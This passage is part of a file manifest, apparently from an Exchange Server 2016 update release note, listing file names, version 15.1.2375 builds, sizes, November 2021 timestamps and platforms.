applicable| 16,366| 3-Nov-21| 18:39| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,358| 3-Nov-21| 18:09| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,201| 3-Nov-21| 18:09| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,666| 3-Nov-21| 18:09| Not applicable \nDisklockerapi.dll| Not applicable| 22,416| 3-Nov-21| 18:19| x64 \nDlmigrationmodule.psm1| Not applicable| 39,592| 3-Nov-21| 18:09| Not applicable \nDsaccessperf.dll| 15.1.2375.17| 45,944| 3-Nov-21| 18:23| x64 \nDscperf.dll| 15.1.2375.17| 32,648| 3-Nov-21| 18:19| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.1.2375.17| 1,686,400| 3-Nov-21| 18:19| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.1.2375.17| 601,480| 3-Nov-21| 18:45| x86 \nEcpperfcounters.xml| Not applicable| 31,180| 3-Nov-21| 18:25| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:12| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.1.2375.17| 13,176| 3-Nov-21| 18:13| x86 \nEdgetransport.exe| 15.1.2375.17| 49,528| 3-Nov-21| 20:01| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 3-Nov-21| 18:08| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:12| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 3-Nov-21| 18:08| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:12| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:12| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:12| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:12| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 3-Nov-21| 18:08| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:12| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:12| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 514| 3-Nov-21| 18:08| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:12| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.1.2375.14| 13,176| 3-Nov-21| 18:09| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.1.2375.17| 13,200| 3-Nov-21| 18:19| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.1.2375.14| 13,176| 3-Nov-21| 18:09| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.1.2375.17| 13,192| 3-Nov-21| 18:29| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.1.2375.17| 13,192| 3-Nov-21| 18:19| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.1.2375.17| 13,176| 3-Nov-21| 18:12| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.1.2375.17| 13,200| 3-Nov-21| 18:19| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.1.2375.14| 13,176| 3-Nov-21| 18:09| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.1.2375.17| 13,176| 3-Nov-21| 18:28| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.1.2375.17| 13,176| 3-Nov-21| 18:12| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.1.2375.14| 13,176| 3-Nov-21| 18:09| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.1.2375.17| 13,200| 3-Nov-21| 18:19| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,376| 3-Nov-21| 18:09| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,575| 3-Nov-21| 18:09| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,600| 3-Nov-21| 18:09| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,606| 3-Nov-21| 18:09| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,928| 3-Nov-21| 18:09| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,659| 3-Nov-21| 18:09| Not applicable \nEngineupdateserviceinterfaces.dll| 15.1.2375.17| 17,800| 3-Nov-21| 18:29| x86 \nEscprint.dll| 15.1.2375.14| 20,368| 3-Nov-21| 18:09| x64 \nEse.dll| 15.1.2375.17| 3,695,504| 3-Nov-21| 18:23| x64 \nEseback2.dll| 15.1.2375.17| 325,008| 3-Nov-21| 18:26| x64 \nEsebcli2.dll| 15.1.2375.17| 292,752| 3-Nov-21| 18:19| x64 \nEseperf.dll| 15.1.2375.17| 116,088| 3-Nov-21| 18:25| x64 \nEseutil.exe| 15.1.2375.17| 398,712| 3-Nov-21| 18:25| x64 \nEsevss.dll| 15.1.2375.17| 44,408| 3-Nov-21| 18:25| x64 \nEtweseproviderresources.dll| 15.1.2375.17| 82,320| 3-Nov-21| 18:12| x64 \nEventperf.dll| 15.1.2375.17| 59,768| 3-Nov-21| 18:12| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,132| 3-Nov-21| 20:45| Not applicable \nExchange.format.ps1xml| Not applicable| 648,635| 3-Nov-21| 20:45| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 43,322| 3-Nov-21| 20:45| Not applicable \nExchange.ps1| Not applicable| 20,803| 3-Nov-21| 20:45| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,547| 3-Nov-21| 20:37| Not applicable \nExchange.types.ps1xml| Not applicable| 365,172| 3-Nov-21| 20:45| Not applicable \nExchangeudfcommon.dll| 15.1.2375.17| 121,224| 3-Nov-21| 18:10| x86 \nExchangeudfs.dll| 15.1.2375.17| 269,704| 3-Nov-21| 18:12| x86 \nExchmem.dll| 15.1.2375.17| 85,904| 3-Nov-21| 18:19| x64 \nExchsetupmsg.dll| 15.1.2375.14| 19,336| 3-Nov-21| 18:09| x64 \nExchucutil.ps1| Not applicable| 23,932| 3-Nov-21| 18:09| Not applicable \nExdbfailureitemapi.dll| Not applicable| 27,016| 3-Nov-21| 18:13| x64 \nExdbmsg.dll| 15.1.2375.17| 229,768| 3-Nov-21| 18:19| x64 \nExeventperfplugin.dll| 15.1.2375.17| 25,464| 3-Nov-21| 18:36| x64 \nExmime.dll| 15.1.2375.17| 364,936| 3-Nov-21| 18:29| x64 \nExportedgeconfig.ps1| Not applicable| 27,403| 3-Nov-21| 18:09| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,566| 3-Nov-21| 18:09| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 28,866| 3-Nov-21| 18:09| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,370| 3-Nov-21| 18:12| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,133| 3-Nov-21| 18:09| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,056| 3-Nov-21| 18:09| Not applicable \nExppw.dll| 15.1.2375.17| 83,320| 3-Nov-21| 18:12| x64 \nExprfdll.dll| 15.1.2375.17| 26,488| 3-Nov-21| 18:36| x64 \nExrpc32.dll| 15.1.2375.17| 1,922,952| 3-Nov-21| 18:29| x64 \nExrw.dll| 15.1.2375.17| 28,024| 3-Nov-21| 18:19| x64 \nExsetdata.dll| 15.1.2375.17| 2,779,528| 3-Nov-21| 18:36| x64 \nExsetup.exe| 15.1.2375.17| 35,216| 3-Nov-21| 20:40| x86 \nExsetupui.exe| 15.1.2375.17| 193,424| 3-Nov-21| 20:40| x86 \nExtrace.dll| 15.1.2375.17| 245,128| 3-Nov-21| 18:10| x64 \nExt_microsoft.exchange.data.transport.dll| 15.1.2375.17| 601,480| 3-Nov-21| 18:45| x86 \nExwatson.dll| 15.1.2375.17| 44,944| 3-Nov-21| 18:19| x64 \nFastioext.dll| 15.1.2375.17| 60,296| 3-Nov-21| 18:36| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,715| 3-Nov-21| 22:12| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,229| 3-Nov-21| 22:12| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,761| 3-Nov-21| 22:12| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,406| 3-Nov-21| 22:12| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,658| 3-Nov-21| 22:11| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,727| 3-Nov-21| 22:12| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,712| 3-Nov-21| 22:12| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,688| 3-Nov-21| 22:12| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 3-Nov-21| 22:11| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,346| 3-Nov-21| 22:11| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,260| 3-Nov-21| 22:12| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,755| 3-Nov-21| 22:12| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,597,359| 3-Nov-21| 22:15| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,597,359| 3-Nov-21| 22:15| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,597,359| 3-Nov-21| 22:15| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,731| 3-Nov-21| 22:11| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,761| 3-Nov-21| 22:12| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,597,359| 3-Nov-21| 22:15| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,718| 3-Nov-21| 22:12| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,597,359| 3-Nov-21| 22:15| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,742| 3-Nov-21| 22:12| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,758| 3-Nov-21| 22:15| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,718| 3-Nov-21| 22:12| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 3-Nov-21| 22:12| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| #########| 3-Nov-21| 22:12| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,745| 3-Nov-21| 22:12| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,718| 3-Nov-21| 22:11| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,597,359| 3-Nov-21| 22:15| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,724| 3-Nov-21| 22:12| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 3-Nov-21| 22:11| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,243| 3-Nov-21| 18:09| Not applicable \nFilteringpowershell.dll| 15.1.2375.17| 223,096| 3-Nov-21| 18:36| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,644| 3-Nov-21| 18:36| Not applicable \nFiltermodule.dll| 15.1.2375.17| 180,112| 3-Nov-21| 18:19| x64 \nFipexeuperfctrresource.dll| 15.1.2375.17| 15,224| 3-Nov-21| 18:28| x64 \nFipexeventsresource.dll| 15.1.2375.17| 44,920| 3-Nov-21| 18:19| x64 \nFipexperfctrresource.dll| 15.1.2375.17| 32,632| 3-Nov-21| 18:27| x64 \nFirewallres.dll| 15.1.2375.17| 72,584| 3-Nov-21| 18:12| x64 \nFms.exe| 15.1.2375.17| 1,350,008| 3-Nov-21| 18:39| x64 \nForefrontactivedirectoryconnector.exe| 15.1.2375.17| 110,992| 3-Nov-21| 18:19| x64 \nFpsdiag.exe| 15.1.2375.17| 18,816| 3-Nov-21| 18:19| x86 \nFsccachedfilemanagedlocal.dll| 15.1.2375.17| 822,152| 3-Nov-21| 18:19| x64 \nFscconfigsupport.dll| 15.1.2375.17| 56,720| 3-Nov-21| 18:19| x86 \nFscconfigurationserver.exe| 15.1.2375.17| 430,992| 3-Nov-21| 18:21| x64 \nFscconfigurationserverinterfaces.dll| 15.1.2375.17| 15,752| 3-Nov-21| 18:22| x86 \nFsccrypto.dll| 15.1.2375.17| 208,784| 3-Nov-21| 18:12| x64 \nFscipcinterfaceslocal.dll| 15.1.2375.17| 28,536| 3-Nov-21| 18:12| x86 \nFscipclocal.dll| 15.1.2375.17| 38,264| 3-Nov-21| 18:25| x86 \nFscsqmuploader.exe| 15.1.2375.17| 453,520| 3-Nov-21| 18:23| x64 \nGetucpool.ps1| Not applicable| 19,787| 3-Nov-21| 18:09| Not applicable \nGetvalidengines.ps1| Not applicable| 13,306| 3-Nov-21| 18:39| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,805| 3-Nov-21| 18:12| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,671| 3-Nov-21| 18:12| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,723| 3-Nov-21| 18:12| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,791| 3-Nov-21| 18:12| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,514| 3-Nov-21| 18:12| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,721| 3-Nov-21| 18:12| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,826| 3-Nov-21| 18:12| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,348| 3-Nov-21| 18:09| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,955| 3-Nov-21| 18:09| Not applicable \nGet_mitigations.ps1| Not applicable| 25,598| 3-Nov-21| 18:09| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,038| 3-Nov-21| 18:09| Not applicable \nGet_storetrace.ps1| Not applicable| 50,647| 3-Nov-21| 18:21| Not applicable \nHuffman_xpress.dll| 15.1.2375.17| 32,632| 3-Nov-21| 18:12| x64 \nImportedgeconfig.ps1| Not applicable| 77,260| 3-Nov-21| 18:09| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,488| 3-Nov-21| 18:09| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,830| 3-Nov-21| 18:09| Not applicable \nInproxy.dll| 15.1.2375.17| 85,904| 3-Nov-21| 18:19| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,515| 3-Nov-21| 18:09| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,945| 3-Nov-21| 18:12| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,979| 3-Nov-21| 21:11| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2375.17| 107,400| 3-Nov-21| 18:10| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2375.17| 20,368| 3-Nov-21| 18:12| Not applicable \nInterop.certenroll.dll| 15.1.2375.17| 142,736| 3-Nov-21| 18:11| x86 \nInterop.licenseinfointerface.dll| 15.1.2375.17| 14,200| 3-Nov-21| 18:25| x86 \nInterop.netfw.dll| 15.1.2375.17| 34,168| 3-Nov-21| 18:10| x86 \nInterop.plalibrary.dll| 15.1.2375.17| 72,584| 3-Nov-21| 18:25| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2375.14| 27,024| 3-Nov-21| 18:09| Not applicable \nInterop.taskscheduler.dll| 15.1.2375.17| 46,472| 3-Nov-21| 18:10| x86 \nInterop.wuapilib.dll| 15.1.2375.17| 60,808| 3-Nov-21| 18:25| x86 \nInterop.xenroll.dll| 15.1.2375.17| 39,800| 3-Nov-21| 18:10| x86 \nKerbauth.dll| 15.1.2375.14| 62,856| 3-Nov-21| 18:09| x64 \nLicenseinfointerface.dll| 15.1.2375.17| 643,472| 3-Nov-21| 18:23| x64 \nLpversioning.xml| Not applicable| 20,422| 3-Nov-21| 20:40| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,896| 3-Nov-21| 18:21| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.1.2375.17| 138,632| 3-Nov-21| 18:12| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 125,853| 3-Nov-21| 18:21| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,372| 3-Nov-21| 18:21| Not applicable \nMce.dll| 15.1.2375.17| 1,693,064| 3-Nov-21| 18:28| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,479| 3-Nov-21| 18:21| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,635| 3-Nov-21| 18:09| Not applicable \nMicrosoft.database.isam.dll| 15.1.2375.17| 127,368| 3-Nov-21| 18:25| x86 \nMicrosoft.dkm.proxy.dll| 15.1.2375.17| 25,976| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.1.2375.17| 68,488| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.1.2375.14| 17,792| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.1.2375.17| 232,824| 3-Nov-21| 20:35| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.1.2375.17| 15,736| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.1.2375.14| 43,400| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.1.2375.17| 1,774,992| 3-Nov-21| 20:14| x86 \nMicrosoft.exchange.airsync.dll1| 15.1.2375.17| 505,720| 3-Nov-21| 21:02| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.1.2375.17| 76,152| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.anchorservice.dll| 15.1.2375.17| 135,544| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.1.2375.17| 23,440| 3-Nov-21| 18:36| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.1.2375.14| 15,736| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.1.2375.17| 27,016| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.approval.applications.dll| 15.1.2375.17| 53,648| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.assistants.dll| 15.1.2375.17| 924,024| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.1.2375.17| 25,976| 3-Nov-21| 18:29| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.1.2375.17| 42,384| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.1.2375.17| 15,240| 3-Nov-21| 20:37| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.1.2375.17| 14,712| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.1.2375.17| 70,520| 3-Nov-21| 20:34| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.1.2375.17| 94,600| 3-Nov-21| 20:45| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.1.2375.17| 13,200| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.1.2375.14| 15,736| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.1.2375.17| 36,728| 3-Nov-21| 20:35| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.1.2375.17| 15,760| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.1.2375.17| 79,752| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.autodiscover.dll| 15.1.2375.17| 396,152| 3-Nov-21| 20:17| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.1.2375.17| 21,368| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.1.2375.17| 57,208| 3-Nov-21| 20:18| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.1.2375.17| 14,712| 3-Nov-21| 20:06| x86 \nMicrosoft.exchange.batchservice.dll| 15.1.2375.17| 35,704| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.cabutility.dll| 15.1.2375.17| 276,344| 3-Nov-21| 18:12| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.1.2375.17| 16,248| 3-Nov-21| 18:29| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.1.2375.17| 25,976| 3-Nov-21| 20:35| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.1.2375.17| 13,688| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.1.2375.17| 23,416| 3-Nov-21| 20:35| x86 \nMicrosoft.exchange.clients.common.dll| 15.1.2375.17| 377,744| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.1.2375.17| 83,840| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.clients.owa.dll| 15.1.2375.17| 2,971,016| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.1.2375.17| 5,017,976| 3-Nov-21| 21:02| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.1.2375.17| 894,344| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.clients.security.dll| 15.1.2375.17| 413,064| 3-Nov-21| 20:42| x86 \nMicrosoft.exchange.clients.strings.dll| 15.1.2375.17| 924,536| 3-Nov-21| 18:21| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.1.2375.17| 31,112| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.cluster.common.dll| 15.1.2375.17| 52,104| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.1.2375.17| 21,896| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.1.2375.17| 33,672| 3-Nov-21| 20:05| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.1.2375.17| 3,525,520| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.1.2375.17| 108,432| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.1.2375.17| 288,648| 3-Nov-21| 20:09| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.1.2375.17| 624,016| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.1.2375.17| 86,392| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.1.2375.17| 1,828,216| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.1.2375.17| 31,608| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.1.2375.17| 466,296| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.1.2375.17| 25,976| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.1.2375.17| 38,264| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.1.2375.17| 102,792| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.1.2375.17| 48,520| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.1.2375.17| 67,472| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.common.dll| 15.1.2375.17| 172,944| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.1.2375.17| 113,528| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.common.il.dll| 15.1.2375.14| 13,704| 3-Nov-21| 18:09| x86 \nMicrosoft.exchange.common.inference.dll| 15.1.2375.17| 130,424| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.common.optics.dll| 15.1.2375.17| 63,888| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.1.2375.17| 19,856| 3-Nov-21| 18:12| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.1.2375.17| 15,224| 3-Nov-21| 18:10| x86 \nMicrosoft.exchange.common.search.dll| 15.1.2375.17| 107,912| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.1.2375.14| 17,808| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.common.smtp.dll| 15.1.2375.17| 51,072| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.1.2375.17| 36,744| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.1.2375.17| 27,528| 3-Nov-21| 18:27| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.1.2375.17| 1,042,320| 3-Nov-21| 18:44| x86 \nMicrosoft.exchange.commonmsg.dll| 15.1.2375.17| 29,064| 3-Nov-21| 18:11| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.1.2375.17| 13,200| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.1.2375.17| 181,112| 3-Nov-21| 20:46| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.1.2375.14| 30,088| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.compliance.common.dll| 15.1.2375.17| 22,408| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.1.2375.14| 85,880| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.compliance.dll| 15.1.2375.17| 35,216| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.1.2375.17| 37,256| 3-Nov-21| 18:24| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.1.2375.17| 50,576| 3-Nov-21| 20:06| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.1.2375.17| 33,160| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.1.2375.17| 1,099,664| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.1.2375.17| 206,200| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.1.2375.17| 210,824| 3-Nov-21| 20:22| x86 \nMicrosoft.exchange.compression.dll| 15.1.2375.17| 17,288| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.1.2375.17| 37,768| 3-Nov-21| 19:49| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.1.2375.14| 14,200| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.configuration.core.dll| 15.1.2375.17| 150,408| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.1.2375.14| 14,224| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.1.2375.17| 53,128| 3-Nov-21| 19:49| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.1.2375.17| 15,760| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.1.2375.17| 23,416| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.1.2375.17| 13,176| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.1.2375.17| 54,648| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.1.2375.17| 13,688| 3-Nov-21| 18:12| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.1.2375.17| 1,847,160| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.1.2375.17| 30,072| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.1.2375.17| 68,472| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.1.2375.17| 15,224| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.1.2375.17| 